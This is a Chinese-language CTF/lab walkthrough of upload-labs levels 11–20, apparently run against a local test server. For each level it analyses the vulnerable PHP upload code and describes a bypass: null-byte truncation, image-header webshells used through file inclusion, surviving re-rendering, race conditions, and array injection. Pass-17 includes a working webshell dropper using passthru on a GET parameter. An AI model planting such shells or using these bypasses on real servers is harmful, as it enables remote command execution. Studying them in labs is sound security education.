Pass-11
这一关我们也是通过分析源码来找到上传方法:
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}接下来我们介绍一下substr函数和strrpos:
substr()
substr() 函数返回字符串的一部分。
substr(string,start,length)
string 必需。规定要返回其中一部分的字符串。
start
必需。规定在字符串的何处开始。
正数 - 在字符串的指定位置开始
负数 - 在从字符串结尾开始的指定位置开始
0 - 在字符串中的第一个字符处开始
length
可选。规定被返回字符串的长度。默认是直到字符串的结尾。
正数 - 从 start 参数所在的位置返回的长度
负数 - 从字符串末端返回的长度
返回值:返回字符串的提取部分,若失败则返回 FALSE,或者返回一个空字符串。
注释:如果 start 参数是负数且 length 小于或等于 start,则 length 为 0。strrpos()
strrpos() 函数查找字符串在另一字符串中最后一次出现的位置。
strrpos(string,find,start)
string 必需。规定被搜索的字符串。
find 必需。规定要查找的字符。
start 可选。规定在何处开始搜索。
返回值:返回字符串在另一字符串中最后一次出现的位置,如果没有找到字符串则返回 FALSE。
注释: 字符串位置从 0 开始,不是从 1 开始。测试:
我们通过分析源码发现save_path是从get参数中获取的,所以我们可以修改这个参数的值,在路径后面使用00截断,这样后面的拼接的内容就失效了。
开始上传。
上传成功,我们拿到地址拦截访问,成功,记得把后1.php后面的内容删除
http://192.168.252.130/upload/1.php%EF%BF%BD/3720200712130145.jpg
Pass-12
分析源码:
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传失败";
}
} else {
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}这一关中的路径获取从get改为post,所以我们对修改post中的路径参数。
这里我们添加%00有两种方法一种是在hex中修改一种是添加%00之后编码为url即可。这里我们上传成功。
接下来我们尝试访问链接:
Pass-13
继续源码分析
function getReailFileType($filename){
$file = fopen($filename, "rb");
$bin = fread($file, 2); //只读2字节
fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type = getReailFileType($temp_file);
if($file_type == 'unknown'){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}函数介绍:
unpack()
unpack() 函数从二进制字符串对数据进行解包。
unpack(format,data)
format 必需。规定在解包数据时所使用的格式。
data 可选。规定被解包的二进制数据。
返回一个数组
format 可能的值:
a - NUL 填充的字符串
A - SPACE 填充的字符串
h - 十六进制字符串,低位在前
H - 十六进制字符串,高位在前
c - signed char
C - unsigned char
s - signed short(总是16位, machine 字节顺序)
S - unsigned short(总是16位, machine 字节顺序)
n - unsigned short(总是16位, big endian 字节顺序)
v - unsigned short(总是16位, little endian 字节顺序)
i - signed integer(取决于 machine 的大小和字节顺序)
I - unsigned integer(取决于 machine 的大小和字节顺序)
l - signed long(总是32位, machine 字节顺序)
L - unsigned long(总是32位, machine 字节顺序)
N - unsigned long(总是32位, big endian 字节顺序)
V - unsigned long(总是32位, little endian 字节顺序)
f - float(取决于 machine 的大小和表示)
d - double(取决于 machine 的大小和表示)
x - NUL 字节
X - 备份一个字节
Z - NUL 填充的字符串
@ - NUL 填充绝对位置
intval()
intval() 函数用于获取变量的整数值。函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。
int intval ( mixed $var [, int $base = 10 ] )
参数说明:
$var:要转换成 integer 的数量值。
$base:转化所使用的进制。
如果 base 是 0,通过检测 var 的格式来决定使用的进制:
如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);
如果字符串以 "0" 开始,使用 8 进制(octal);
两个都不是将使用 10 进制 (decimal)。
成功时返回 var 的 integer 值,失败时返回 0。 空的 array 返回 0,非空的 array 返回 1。我们可以看到,这次他将接受到的文件名传递到一个函数中进行处理,在函数中读取了我们上传文件的前两个字节,转为10进制后拼接,紧接着进行判断,意思就是判断了我们上传文件的文件头是否是图片的文件头,所以我们需要带有图片头文件的马即可。
开始上传:
上传成功,但是要想里面的php代码执行需要我们结合着.htaccess或者文件包含漏洞才能完成利用。
这里有供我们测试的文件包含,我们进行测试,成功:
Pass-14
分析源码:
function isImage($filename){
$types = '.jpeg|.png|.gif';
if(file_exists($filename)){
$info = getimagesize($filename);
$ext = image_type_to_extension($info[2]);
if(stripos($types,$ext)>=0){
return $ext;
}else{
return false;
}
}else{
return false;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}这次使用getimagesize获取文件信息,然后获得文件的后缀,这次我们还是可以用图片中插入shell来完成
将代码插在图片最后即可,我们得到返回的文件名。
http://192.168.252.130/upload/3920200712154711.jpg通过文件包含来测试:
Pass-15
源码分析:
function isImage($filename){
//需要开启php_exif模块
$image_type = exif_imagetype($filename);
switch ($image_type) {
case IMAGETYPE_GIF:
return "gif";
break;
case IMAGETYPE_JPEG:
return "jpg";
break;
case IMAGETYPE_PNG:
return "png";
break;
default:
return false;
break;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
函数介绍:
exif_imagetype()
exif_imagetype() 读取一个图像的第一个字节并检查其签名。
exif_imagetype ( string $filename ) : int
filename 被检查的图像文件名。
返回值 如果发现了恰当的签名则返回一个对应的常量,否则返回 FALSE。
这一关中获取图片格式的函数有进行了改变,但是我们使用的图片吗丝毫不受到影响,成功上传,完成测试:
http://192.168.252.130/inc.php?file=./upload/4320200712155635.jpg
Pass-16
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
$filename = $_FILES['upload_file']['name'];
$filetype = $_FILES['upload_file']['type'];
$tmpname = $_FILES['upload_file']['tmp_name'];
$target_path=UPLOAD_PATH.'/'.basename($filename);
// 获得上传文件的扩展名
$fileext= substr(strrchr($filename,"."),1);
//判断文件后缀与类型,合法才进行上传操作
if(($fileext == "jpg") && ($filetype=="image/jpeg")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefromjpeg($target_path);
if($im == false){
$msg = "该文件不是jpg格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".jpg";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagejpeg($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "png") && ($filetype=="image/png")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefrompng($target_path);
if($im == false){
$msg = "该文件不是png格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".png";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagepng($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "gif") && ($filetype=="image/gif")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefromgif($target_path);
if($im == false){
$msg = "该文件不是gif格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".gif";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagegif($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else{
$msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
}
}函数介绍:
imagecreatefromjpeg()
imagecreatefromjpeg() 返回一图像标识符,代表了从给定的文件名取得的图像。
由文件或 URL 创建一个新图象。
ilename JPEG 图像的路径。
成功后返回图象资源,失败后返回 FALSE 。unlink()
unlink() 函数删除文件。
unlink(filename,context)
filename 必需。规定要删除的文件。
context 可选。规定文件句柄的环境。Context 是可修改流的行为的一套选项。
若成功,则返回 true,失败则返回 false。imagegif()
imagegif ( resource $image [, string $filename ] ) : bool
imagegif() 从 image 图像以 filename 为文件名创建一个 GIF 图像。image 参数是 imagecreate() 或 imagecreatefrom* 函数的返回值。
image 由图象创建函数(例如imagecreatetruecolor())返回的图象资源。
filename 文件保存的路径,如果未设置或为 NULL,将会直接输出原始图象流。
成功时返回 TRUE, 或者在失败时返回 FALSE。这次的代码怎么说呢,强行将三种类型的图片分开判断,虽然判断的代码一样,代码判断的逻辑中
首先使用imagecreatefromjpeg来生成一个新的图像,接着判断图片的后缀,后缀是图片类型之后,随机生成文件名。
这一关是二次渲染的绕过,我们可以将上传的文件和我们源文件进行对比查看那个地方保持原样:
二次渲染过的文件:
没有渲染过的文件:
我们发现其渲染过后,文件头的位置基本没有变化,所以我们在一个正常的gif图片文件头的位置添加代码即可:
上传成功之后我们访问链接:
http://192.168.252.130/inc.php?file=./upload/26442.gif
Pass-17
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_name = $_FILES['upload_file']['name'];
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_ext = substr($file_name,strrpos($file_name,".")+1);
$upload_file = UPLOAD_PATH . '/' . $file_name;
if(move_uploaded_file($temp_file, $upload_file)){
if(in_array($file_ext,$ext_arr)){
$img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
rename($upload_file, $img_path);
$is_upload = true;
}else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
unlink($upload_file);
}
}else{
$msg = '上传出错!';
}
}我们可以看到它会先使用move_uploaded_file()来将图片上传,然后判断文件是是图片,如果不是再删除,这里我们可以看到文件是会在目标服务器上存在的,所以我们可以利用多线程来同时发送多个请求包,就会有很大概率可以访问到这个shell,但是使用条件竞争来完成,但是成功率不是很高,我们在burp中抓包发送爆破,我这里设置如下:
burp多线程:
最终在爆破的时候不停的刷新访问到了上传的文件。
当然我们访问到phpinfo用处也不大,所以我们可以上传一个写马的文件,我们访问这个页面成功的时候,就会生成一个shell,不需要我们一直条件竞争了。
<?php $a=fopen('t3st.php','w');fwrite($a,'<?php passthru($_GET["cmd"]);?>');?>Pass-18
这次的代码有点长:
//index.php
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
require_once("./myupload.php");
$imgFileName =time();
$u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
$status_code = $u->upload(UPLOAD_PATH);
switch ($status_code) {
case 1:
$is_upload = true;
$img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
break;
case 2:
$msg = '文件已经被上传,但没有重命名。';
break;
case -1:
$msg = '这个文件不能上传到服务器的临时文件存储目录。';
break;
case -2:
$msg = '上传失败,上传目录不可写。';
break;
case -3:
$msg = '上传失败,无法上传该类型文件。';
break;
case -4:
$msg = '上传失败,上传的文件过大。';
break;
case -5:
$msg = '上传失败,服务器已经存在相同名称文件。';
break;
case -6:
$msg = '文件无法上传,文件不能复制到目标目录。';
break;
default:
$msg = '未知错误!';
break;
}
}
//myupload.php
class MyUpload{
......
......
......
var $cls_arr_ext_accepted = array(
".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
".html", ".xml", ".tiff", ".jpeg", ".png" );
......
......
......
/** upload()
**
** Method to upload the file.
** This is the only method to call outside the class.
** @para String name of directory we upload to
** @returns void
**/
function upload( $dir ){
$ret = $this->isUploadedFile();//检查文件是否通过HTTP上传
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
$ret = $this->setDir( $dir );//检查目录是否可写
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
$ret = $this->checkExtension();//检查文件后缀是否在白名单里(最后一个点后的小写的部分是否在数组中)
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
$ret = $this->checkSize();//文件大小是否超过最大上传限制
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
// if flag to check if the file exists is set to 1
if( $this->cls_file_exists == 1 ){
$ret = $this->checkFileExists();//检测文件是否存在
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
}
// if we are here, we are ready to move the file to destination
$ret = $this->move();//是否可以移动
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
// check if we need to rename the file
if( $this->cls_rename_file == 1 ){
$ret = $this->renameFile();//是否可以重命名
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
}
// if we are here, everything worked as planned :)
return $this->resultUpload( "SUCCESS" );
}
......
......
......
};在这次的源码中,自己在一个文件中实现了一个MyUpload的类,类中包含各种类型错误判断的函数,由于是在太长,这里就按照给出的部分贴出。
函数介绍:
is_uploaded_file()
is_uploaded_file()函数检查指定的文件是否是通过HTTP POST上传的。
file 必需。规定要检查的文件。
如果文件是通过HTTP POST上传的,该函数返回TRUE。经过我们的分析,我们发现其还是可以通过条件竞争来解决这个问题,我们可以看到是否可以移动和是否可以冲命名是分开执行的,使用高并发还是有机会可以访问到文件的,所以我们尝试继续来使用burp搞事。我们通过源码分析知道文件上传的位置是在根目录下的我们上传时候的文件名这里有问题,这里的路径传输错误,我们将其改到upload下,接着我们直接访问我们的文件,知道执行为止,我们这里还利用了后缀为.7z的文件,这个文件可以被当做php执行,接下来我们进行测试:
这里可以不需要条件竞争,因为它没有删除源文件,所以我们也可以直接访问.7z文件来执行
生成了我们的后门文件。
Pass-19
分析源码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = $_POST['save_name'];
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!in_array($file_ext,$deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
}else{
$msg = '上传出错!';
}
}else{
$msg = '禁止保存为该类型文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}函数介绍:
pathinfo()
pathinfo — 返回文件路径的信息
pathinfo ( string $path [, int $options = PATHINFO_DIRNAME | PATHINFO_BASENAME | PATHINFO_EXTENSION | PATHINFO_FILENAME ] ) : mixed
pathinfo() 返回一个关联数组包含有 path 的信息。返回关联数组还是字符串取决于 options。
path 要解析的路径。
options 如果指定了,将会返回指定元素;它们包括:PATHINFO_DIRNAME,PATHINFO_BASENAME 和 PATHINFO_EXTENSION 或 PATHINFO_FILENAME。
如果没有指定 options 默认是返回全部的单元。经过我们分析之后我们发现,这里有个参数是我们可以控制的就是save_name,我们可以在这个参数后面使用00截断来进行绕过,好的接下来我们开始测试
上传文件,上传的是一个gif文件,在文件头中添加了phpinfo():
成功上传,我们尝试访问文件,成功。
Pass-20
$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
//检查MIME
$allow_type = array('image/jpeg','image/png','image/gif');
if(!in_array($_FILES['upload_file']['type'],$allow_type)){
$msg = "禁止上传该类型文件!";
}else{
//检查文件名
$file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
if (!is_array($file)) {
$file = explode('.', strtolower($file));
}
$ext = end($file);
$allow_suffix = array('jpg','png','gif');
if (!in_array($ext, $allow_suffix)) {
$msg = "禁止上传该后缀文件!";
}else{
$file_name = reset($file) . '.' . $file[count($file) - 1];
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
//Less20.php,upload/Less20.php
$msg = "文件上传成功!";
$is_upload = true;
} else {
$msg = "文件上传失败!";
}
}
}
}else{
$msg = "请选择要上传的文件!";
}函数介绍:
explode()...
empty判断是否为空,如果为空返回TRUE否者返回FALSE
explode() 函数把字符串打散为数组。
explode(separator,string,limit)
separator 必需。规定在哪里分割字符串。
string 必需。要分割的字符串。
limit
可选。规定所返回的数组元素的数目。
可能的值:
大于 0 - 返回包含最多 limit 个元素的数组
小于 0 - 返回包含除了最后的 -limit 个元素以外的所有元素的数组
0 - 返回包含一个元素的数组
end() 取到数组中的最后一个元素
reset() 将 array 的内部指针倒回到第一个单元并返回第一个数组单元的值。如果数组为空则返回 FALSE。这一关首先检查了请求包中的文件类型,然后判断save_name这个参数是否为空,如果为save为空使用上传时候的name,不为空使用save_name,接下来判断是否是数组,如果不是数组将字符串以点分割为数组,然后使用end函数获取最后一个元素来当作后缀,接下来判断后缀是否在白名单中,接下来就根据从数组的总数-1的位置拿到后缀,然后进行文件移动。
梳理了流程之后我们可以,我们发现我们可以上传一个数组,这样就会避免被分割,然后给数组中的第1个元素和第三个元素赋值,空出第二个,这样拼接的时候就获取的为空,而那个点会被忽略掉从而上传成功。我们来进行测试:
上传成功,我们访问文件路径: